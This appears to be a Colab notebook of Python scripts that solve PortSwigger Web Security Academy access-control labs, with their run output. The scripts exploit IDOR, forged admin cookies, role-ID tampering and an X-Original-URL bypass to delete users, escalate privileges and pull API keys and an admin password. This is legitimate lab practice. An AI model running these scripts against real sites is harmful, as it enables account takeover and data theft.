<a href="https://colab.research.google.com/github/himuethic/Access-control-/blob/main/Access_control.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
import requests
import sys

def delete_user(url):
    admin_panel_url = url + '/administrator-panel'
    r = requests.get(admin_panel_url, verify=False)
    if r.status_code == 200:
        print('(+) Found the administrator panel!')
        print('(+) Deleting Carlos user...')
        delete_carlos_url = admin_panel_url + '/delete?username=carlos'
        r = requests.get(delete_carlos_url, verify=False)
        if r.status_code == 200:
            print('(+) Carlos user deleted!')
        else:
            print('(-) Could not delete user.')
    else:
        print('(-) Administrator panel not found.')
        print('(-) Exiting the script...')

def main():
    url = 'https://0aa3005403f3b5e7806bdf58001700d3.web-security-academy.net'
    print("(+) Finding admin panel...")
    delete_user(url)

if __name__ == "__main__":
    main()

(+) Finding admin panel...


/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py:1100: InsecureRequestWarning: Unverified HTTPS request is being made to host '0aa3005403f3b5e7806bdf58001700d3.web-security-academy.net'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
  warnings.warn(


(+) Found the administrator panel!
(+) Deleting Carlos user...


/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py:1100: InsecureRequestWarning: Unverified HTTPS request is being made to host '0aa3005403f3b5e7806bdf58001700d3.web-security-academy.net'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
  warnings.warn(


(+) Carlos user deleted!


/usr/local/lib/python3.10/dist-packages/urllib3/connectionpool.py:1100: InsecureRequestWarning: Unverified HTTPS request is being made to host '0aa3005403f3b5e7806bdf58001700d3.web-security-academy.net'. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
  warnings.warn(


In [ ]:
import requests
import sys
import urllib3
from bs4 import BeautifulSoup
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def delete_user(url):
    r = requests.get(url, verify=False)


    session_cookie = r.cookies.get_dict().get('session')


    soup = BeautifulSoup(r.text, 'lxml')
    admin_instances = soup.find(text=re.compile("/admin-"))
    admin_path = re.search("href', '(.*)'", admin_instances).group(1)

    # Delete Carlos user
    cookies = {'session': session_cookie}
    delete_carlos_url = url + admin_path + '/delete?username=carlos'
    r = requests.get(delete_carlos_url, cookies=cookies, verify=False)
    if r.status_code == 200:
        print('(+) Carlos user deleted!')
    else:
        print('(-) Deletion failed.')
        print('(-) Exiting script...')
        sys.exit(-1)

def main():
    url = 'https://0aa200a4047dd73581ed6177007a0043.web-security-academy.net'
    print("(+) Deleting Carlos user...")
    delete_user(url)

if __name__ == "__main__":
    main()

(+) Deleting Carlos user...


<ipython-input-2-92a3ce98a718>:17: DeprecationWarning: The 'text' argument to find()-type methods is deprecated. Use 'string' instead.
  admin_instances = soup.find(text=re.compile("/admin-"))


(+) Carlos user deleted!


In [ ]:

import requests
import urllib3
from bs4 import BeautifulSoup
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def delete_user(s, url):

    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    # Login as the wiener user
    data = {
        "csrf": csrf_token,
        "username": "wiener",
        "password": "peter"
    }

    r = s.post(login_url, data=data, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        # Retrieve the session cookie
        my_account_url = url + "/my-account"
        r = s.get(my_account_url, verify=False)
        session_cookie = s.cookies.get_dict().get('session')

        # Visit the admin panel and delete the user carlos
        delete_carlos_user_url = url + "/admin/delete?username=carlos"
        cookies = {'Admin': 'true', 'session': session_cookie}
        r = s.get(delete_carlos_user_url, cookies=cookies, verify=False)
        if r.status_code == 200:
            print('(+) Successfully deleted Carlos user.')
        else:
            print('(-) Failed to delete Carlos user.')
            print('Status Code:', r.status_code)
            print('Response:', r.text)
    else:
        print("(-) Failed to login as the wiener user.")
        print('Response:', res)

def main():
    url = 'https://0a010012033eb51180bcf36600b2008f.web-security-academy.net'
    s = requests.Session()
    delete_user(s, url)

if __name__ == "__main__":
    main()

(+) Successfully logged in as the wiener user.
(-) Failed to delete Carlos user.
Status Code: 401
Response: <!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labs.css rel=stylesheet>
        <title>User role controlled by request parameter</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner is-solved'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>User role controlled by request parameter</h2>
                            <a class=link-back href='https://portswigger.net/web-security/access-control/lab-user-role-controlled-by-request-parameter'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                          

In [ ]:
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def delete_user(s, url):
    # Login as the wiener user
    login_url = url + "/login"
    data_login = {"username": "wiener", "password": "peter"}
    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        # Change the role id of the user
        change_email_url = url + "/my-account/change-email"
        data_role_change = {"email": "test@test.ca", "roleid": 2}
        r = s.post(change_email_url, json=data_role_change, verify=False)
        res = r.text
        if 'Admin' in res:
            print("(+) Successfully changed the role id.")

            # Delete the Carlos user
            delete_carlos_user_url = url + "/admin/delete?username=carlos"
            r = s.get(delete_carlos_user_url, verify=False)

            if r.status_code == 200:
                print("(+) Successfully deleted Carlos user.")
            else:
                print("(-) Could not delete Carlos user.")
                print('Status Code:', r.status_code)
                print('Response:', r.text)
        else:
            print("(-) Could not change the role id.")
            print('Response:', res)
    else:
        print("(-) Could not login as the wiener user.")
        print('Response:', res)

def main():
    url = 'https://0aac009c036a44e48065bcef005a0036.web-security-academy.net'
    s = requests.Session()
    delete_user(s, url)

if __name__ == "__main__":
    main()

(+) Successfully logged in as the wiener user.
(+) Successfully changed the role id.
(+) Successfully deleted Carlos user.


In [ ]:
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def delete_user(s, url):
    delete_carlos_user_url = url + "/?username=carlos"
    headers = {"X-Original-URL": "/admin/delete"}
    r = s.get(delete_carlos_user_url, headers=headers, verify=False)

    # Verify if the user was deleted
    r = s.get(url, verify=False)
    res = r.text
    if "Congratulations, you solved the lab!" in res:
        print("(+) Successfully done.")
    else:
        print("(-) Could not delete Carlos user.")
        print('Status Code:', r.status_code)
        print('Response:', r.text)

def main():
    url = 'https://0a0c00a5044db2d1819f2f6900d10084.web-security-academy.net'
    s = requests.Session()
    delete_user(s, url)

if __name__ == "__main__":
    main()

(+) Successfully done.


In [ ]:
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def promote_to_admin(s, url):

    # login as the wiener user
    login_url = url + "/login"
    data_login = {"username": "wiener", "password": "peter"}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        # Exploit access control vulnerability to promote the user to admin
        admin_roles_url = url + "/admin-roles?username=wiener&action=upgrade"
        r = s.get(admin_roles_url, verify=False)
        res = r.text
        if "Admin panel" in res:
            print("(+) Successfully promoted the user to administrator.")
        else:
            print("(-) Could not promote the user to administrator.")
            print('Status Code:', r.status_code)
            print('Response:', r.text)
    else:
        print("(-) Could not login as the wiener user.")
        print('Response:', res)

def main():
    url = 'https://0ace00a7045ed754818184d300360092.web-security-academy.net'
    s = requests.Session()
    promote_to_admin(s, url)

if __name__ == "__main__":
    main()

(+) Successfully logged in as the wiener user.
(+) Successfully promoted the user to administrator.


In [ ]:
import requests
import urllib3
from bs4 import BeautifulSoup
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def carlos_api_key(s, url):
    # Get CSRF token from login page
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    # Login as the wiener user
    print("(+) Logging in as the wiener user...")
    data_login = {"csrf": csrf_token, "username": "wiener", "password": "peter"}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        # Exploit access control vulnerability and access Carlos's account
        carlos_url = url + "/my-account?id=carlos"
        r = s.get(carlos_url, verify=False)
        res = r.text
        if "carlos" in res:
            print("(+) Successfully accessed Carlos's account!")
            print("(+) Retrieving the API key...")
            api_key = re.search("Your API Key is:(.*)", res).group(1)
            print('API key is:' + api_key.split('</div>')[0].strip())
        else:
            print("(-) Could not access Carlos's account.")
    else:
        print("(-) Could not login as the wiener user.")

def main():
    url = 'https://0af100f903493b28818907f8006a0030.web-security-academy.net'
    s = requests.Session()
    carlos_api_key(s, url)

if __name__ == "__main__":
    main()

(+) Logging in as the wiener user...
(+) Successfully logged in as the wiener user.
(+) Successfully accessed Carlos's account!
(+) Retrieving the API key...
API key is:H0aNYMcZD3pSheGWmy4bF4sC6YLtJu4C


In [ ]:
import requests
from bs4 import BeautifulSoup
import re


requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def carlos_guid(s, url):
    r = s.get(url, verify=False)
    res = r.text
    post_ids = re.findall(r'postId=(\w+)"', res)
    unique_post_ids = list(set(post_ids))

    for i in unique_post_ids:
        r = s.get(url + "/post?postId=" + i, verify=False)
        res = r.text
        if 'carlos' in res:
            print("(+) Found Carlos GUID...")
            guid = re.findall(r"userId=(.*)'", res)[0]
            return guid

def carlos_api_key(s, url):
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token}
    r = s.post(login_url, data=data_login, verify=False)
    res = r.text

    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        guid = carlos_guid(s, url)

        carlos_account_url = url + "/my-account?id=" + guid
        r = s.get(carlos_account_url, verify=False)
        res = r.text
        if 'carlos' in res:
            print("(+) Successfully accessed Carlos's account...")
            print("(+) Retrieving API key...")
            api_key = re.findall(r'Your API Key is:(.*)\<\/div>', res)
            print('API key is: ' + api_key[0])
        else:
            print("(-) Could not access Carlos's account.")
    else:
        print("(-) Could not login as the wiener user.")

def main():
    url = "https://0ad9001e04ea598581d3254000770065.web-security-academy.net"

    s = requests.Session()
    carlos_api_key(s, url)

if __name__ == "__main__":
    main()

(+) Successfully logged in as the wiener user.
(+) Found Carlos GUID...
(+) Successfully accessed Carlos's account...
(+) Retrieving API key...
API key is:  gHjff92uyOzFJBJDrPYFyLY2RwiM1ak8


In [ ]:
import requests
from bs4 import BeautifulSoup
import re

# Disable SSL warnings (not recommended for production)
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def carlos_api_key(s, url):
    # Get CSRF token from the login page
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    # Login as the wiener user
    print("(+) Logging in as the wiener user...")
    data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user.")

        # Access the Carlos account
        print("(+) Attempting to exploit access control vulnerability...")
        carlos_account_url = url + "/my-account?id=carlos"
        r = s.get(carlos_account_url, allow_redirects=False, verify=False)
        res = r.text
        if "carlos" in res:
            print("(+) Retrieving API key...")
            api_key = re.findall(r'Your API Key is:(.*)\<\/div>', res)
            print('API key is: ' + api_key[0])
        else:
            print("(-) Could not exploit access control vulnerability.")
    else:
        print("(-) Could not login as the wiener user.")

def main():
    url = "https://0ae4002904a5598581962fe600b0004b.web-security-academy.net"

    s = requests.Session()
    carlos_api_key(s, url)

if __name__ == "__main__":
    main()

(+) Logging in as the wiener user...
(+) Successfully logged in as the wiener user.
(+) Attempting to exploit access control vulnerability...
(+) Retrieving API key...
API key is:  8Wgr2WU8WxmDaDGMoZmGMdqeHoBD61WP


In [ ]:
import requests
from bs4 import BeautifulSoup
import re

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def retrieve_admin_password(s, url):
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    print("(+) Logging in as the wiener user...")
    data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user...")

        admin_account_url = url + "/my-account?id=administrator"
        r = s.get(admin_account_url, verify=False)
        res = r.text

        if 'administrator' in res:
            print("(+) Successfully accessed the administrator account...")
            print("(+) Retrieving the administrator password...")
            soup = BeautifulSoup(r.text, 'html.parser')
            password = soup.find("input", {'name': 'password'})['value']
            return password
        else:
            print("(-) Could not access the administrator account.")
            sys.exit(-1)
    else:
        print("(-) Could not login as the wiener user.")
        sys.exit(-1)

def delete_carlos_user(s, url, password):
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    print("(+) Logging in as the administrator user...")
    data_login = {"username": "administrator", "password": password, "csrf": csrf_token}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the administrator user...")

        print("(+) Deleting Carlos user...")
        delete_carlos_url = url + "/admin/delete?username=carlos"  # Ensure this line is properly terminated
        r = s.get(delete_carlos_url, verify=False)
        if r.status_code == 200:
            print("Successfully deleted the Carlos user.")
        else:
            print("Could not delete the Carlos user.")
            sys.exit(-1)
    else:
        print("(-) Could not login as the administrator user.")
        sys.exit(-1)

def main():
    url = "https://0a0e0042034735268090712a00d800a5.web-security-academy.net"

    s = requests.Session()
    admin_password = retrieve_admin_password(s, url)

    delete_carlos_user(s, url, admin_password)

if __name__ == "__main__":
    main()

(+) Logging in as the wiener user...
(+) Successfully logged in as the wiener user...
(+) Successfully accessed the administrator account...
(+) Retrieving the administrator password...
(+) Logging in as the administrator user...
(+) Successfully logged in as the administrator user...
(+) Deleting Carlos user...
Successfully deleted the Carlos user.


In [ ]:
import requests
from bs4 import BeautifulSoup
import re

# Disable SSL warnings (not recommended for production)
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def get_csrf_token(s, url):
    r = s.get(url, verify=False)
    soup = BeautifulSoup(r.text, 'html.parser')
    csrf = soup.find("input", {'name': 'csrf'})['value']
    return csrf

def retrieve_admin_password(s, url):
    # Retrieve the CSRF token
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    # Login as the wiener user
    print("(+) Logging in as the wiener user...")
    data_login = {"username": "wiener", "password": "peter", "csrf": csrf_token}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user...")

        # Retrieve admin password
        admin_account_url = url + "/my-account?id=administrator"
        r = s.get(admin_account_url, verify=False)
        res = r.text

        if 'administrator' in res:
            print("(+) Successfully accessed the administrator account...")
            print("(+) Retrieving the administrator password...")
            soup = BeautifulSoup(r.text, 'html.parser')
            password = soup.find("input", {'name': 'password'})['value']
            return password
        else:
            print("(-) Could not access the administrator account.")
            sys.exit(-1)
    else:
        print("(-) Could not login as the wiener user.")
        sys.exit(-1)

def delete_carlos_user(s, url, password):
    # Retrieve the CSRF token
    login_url = url + "/login"
    csrf_token = get_csrf_token(s, login_url)

    # Login as the administrator user
    print("(+) Logging in as the administrator user...")
    data_login = {"username": "administrator", "password": password, "csrf": csrf_token}

    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the administrator user...")

        # Deleting the user
        print("(+) Deleting Carlos user...")
        delete_carlos_url = url + "/admin/delete?username=carlos"
        r = s.get(delete_carlos_url, verify=False)
        if r.status_code == 200:
            print("Successfully deleted the Carlos user.")
        else:
            print("Could not delete the Carlos user.")
            sys.exit(-1)
    else:
        print("(-) Could not login as the administrator user.")
        sys.exit(-1)

def main():
    url = "https://0a0e0042034735268090712a00d800a5.web-security-academy.net"

    s = requests.Session()
    admin_password = retrieve_admin_password(s, url)

    # Perform deletion of Carlos user
    delete_carlos_user(s, url, admin_password)

if __name__ == "__main__":
    main()

(+) Logging in as the wiener user...
(+) Successfully logged in as the wiener user...
(+) Successfully accessed the administrator account...
(+) Retrieving the administrator password...
(+) Logging in as the administrator user...
(+) Successfully logged in as the administrator user...
(+) Deleting Carlos user...
Successfully deleted the Carlos user.


In [ ]:
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def upgrade_wiener_user(s, url):

    # login as the wiener user
    login_url = url + '/login'
    data_login = {'username': 'wiener', 'password': 'peter'}
    r = s.post(login_url, data=data_login, verify=False)
    res = r.text
    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user...")

        # Upgrade the user to administrator
        print("(+) Upgrading user to administrator...")
        upgrade_url = url + "/admin-roles"
        data_upgrade = {'action': 'upgrade', 'confirmed': 'true', 'username': 'wiener'}
        r = s.post(upgrade_url, data=data_upgrade, verify=False)
        if r.status_code == 200:
            print("(+) Successfully upgraded user to administrator.")
        else:
            print("(-) Could not upgrade user to administrator.")
    else:
        print("(-) Could not login as the wiener user.")

def main():
    url = "https://0a930009048ce03284e0fe67003a0055.web-security-academy.net/"
    s = requests.Session()
    upgrade_wiener_user(s, url)

if __name__ == "__main__":
    main()

(-) Could not login as the wiener user.


In [ ]:
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def upgrade_wiener_user(s, url):

    # login as the wiener user
    login_url = url + '/login'
    data_login = {'username': 'wiener', 'password': 'peter'}
    r = s.post(login_url, data=data_login, verify=False)
    res = r.text

    print("(+) Login response status code:", r.status_code)
    print("(+) Login response headers:", r.headers)
    print("(+) Login response text:", res[:500])  # Print the first 500 characters of the response text for debugging

    if "Log out" in res:
        print("(+) Successfully logged in as the wiener user...")

        # Upgrade the user to administrator
        print("(+) Upgrading user to administrator...")
        upgrade_url = url + "/admin-roles"
        data_upgrade = {'action': 'upgrade', 'confirmed': 'true', 'username': 'wiener'}
        r = s.post(upgrade_url, data=data_upgrade, verify=False)

        print("(+) Upgrade response status code:", r.status_code)
        print("(+) Upgrade response headers:", r.headers)
        print("(+) Upgrade response text:", r.text[:500])  # Print the first 500 characters of the response text for debugging

        if r.status_code == 200:
            print("(+) Successfully upgraded user to administrator.")
        else:
            print("(-) Could not upgrade user to administrator.")
    else:
        print("(-) Could not login as the wiener user.")

def main():
    url = "https://0a930009048ce03284e0fe67003a0055.web-security-academy.net"
    s = requests.Session()
    upgrade_wiener_user(s, url)

if __name__ == "__main__":
    main()

(+) Login response status code: 200
(+) Login response headers: {'Content-Type': 'text/html; charset=utf-8', 'Cache-Control': 'no-cache', 'X-Frame-Options': 'SAMEORIGIN', 'Content-Encoding': 'gzip', 'Connection': 'close', 'Content-Length': '1859'}
(+) Login response text: <!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labs.css rel=stylesheet>
        <title>Multi-step process with no access control on one step</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner is-solved'>
                <div class=container>
                    <div c
(+) Successfully logged in as the wiener user...
(+) Upgrading user to administrator...
(+) Upgrade response status code: 200
(+) Upgrade response headers: {'Content-Type': 'text/html; charset=utf-8', 'Cache-Control': 'no-cach